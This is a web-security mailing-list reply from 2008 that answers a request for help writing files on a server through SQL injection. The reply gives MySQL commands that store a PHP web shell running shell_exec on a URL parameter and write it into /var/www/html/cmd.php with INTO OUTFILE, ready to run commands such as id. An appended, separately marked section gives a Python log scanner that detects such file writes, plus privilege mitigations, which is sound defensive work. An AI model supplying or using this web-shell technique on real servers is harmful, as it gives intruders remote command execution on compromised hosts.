
Re: [WEB SECURITY] Create File in mysql injection



You need "FILE" GRANT access (1), and write permission in the file system
for your running mysql process.


mysql> CREATE TABLE crap (codetab text);
Query OK, 0 rows affected (0.01 sec)

mysql> INSERT INTO crap (codetab) values ('<? $out =
shell_exec($_GET["cmd"]." 2>&1"); echo "<pre>$out</pre>"; ?>');
Query OK, 1 row affected (0.00 sec)

mysql>  SELECT * INTO OUTFILE '/var/www/html/cmd.php' from crap;
Query OK, 1 row affected (0.00 sec)

And now, you can access with: cmd.php?cmd=id

(1)   http://dev.mysql.com/doc/refman/5.0/en/grant.html



On Sat, Mar 1, 2008 at 2:00 PM, Simorgh Security
<simorgh.security@xxxxxxxxx> wrote:
> In the name of God.
>
>  I have a question.
>
>  I can't create a file on the server with SQL injection.
>  mysql user : root
>  mysql version : 4.0.2
>
>
>  Please help me. Thanks.
>
>  ----------------------------------------------------------------------------
>  Join us on IRC: irc.freenode.net #webappsec
>
>  Have a question? Search The Web Security Mailing List Archives:
>  http://www.webappsec.org/lists/websecurity/
>
>  Subscribe via RSS:
>  http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>
>



-- 

A. Ramos  <aka dab>
mailto: <aramosf@xxxxxxxxx>
http://www.unsec.net
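
Added example, not part of the original message: a defender-side check that scans MySQL general query log lines for the INTO OUTFILE write shown in the reply (and its INTO DUMPFILE sibling) and ranks each hit by where the file lands. The web roots, script extensions and log lines are assumptions constructed for illustration.

```python
import posixpath
import re

# Assumed web roots and script extensions; adjust to the hosts being monitored.
WEB_ROOTS = ("/var/www", "/srv/www", "/usr/share/nginx")
SCRIPT_EXTS = (".php", ".phtml", ".jsp", ".asp", ".aspx", ".cgi")

# INTO OUTFILE / INTO DUMPFILE followed by a quoted path (any case, any spacing).
FILE_WRITE = re.compile(r"\bINTO\s+(OUTFILE|DUMPFILE)\s+(['\"])(.+?)\2", re.I | re.S)
# Inline comments are normalised to a space before matching the keywords.
COMMENT = re.compile(r"/\*.*?\*/", re.S)

def classify(statement):
    """Return (severity, path) for a file-writing statement, else None."""
    m = FILE_WRITE.search(COMMENT.sub(" ", statement))
    if not m:
        return None
    path = posixpath.normpath(m.group(3))   # collapse ../ and duplicate slashes
    in_web_root = any(path == r or path.startswith(r + "/") for r in WEB_ROOTS)
    is_script = path.lower().endswith(SCRIPT_EXTS)
    if in_web_root and is_script:
        return ("critical", path)           # executable file inside a web root
    if in_web_root or is_script:
        return ("high", path)
    return ("review", path)                 # any other server-side file write

def scan(lines):
    """Yield (line_no, severity, path) for each flagged general-log line."""
    for n, line in enumerate(lines, 1):
        hit = classify(line)
        if hit:
            yield (n, *hit)

# Constructed sample in the shape of a MySQL general query log.
SAMPLE_LOG = """\
080301 14:02:11  12 Query  SELECT id, title FROM news WHERE id = 7
080301 14:02:40  12 Query  SELECT * INTO OUTFILE '/var/www/html/cmd.php' from crap
080301 14:03:02  12 Query  select 1 into/**/dumpfile '/tmp/../var/www/html/x.txt'
080301 14:05:19  15 Query  SELECT * FROM orders INTO OUTFILE '/backup/orders.csv'
""".splitlines()

if __name__ == "__main__":
    for line_no, severity, path in scan(SAMPLE_LOG):
        print(f"line {line_no}: {severity:8} {path}")
```

Revoking the FILE privilege from application accounts, or restricting export paths with secure_file_priv, removes the precondition the reply describes.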
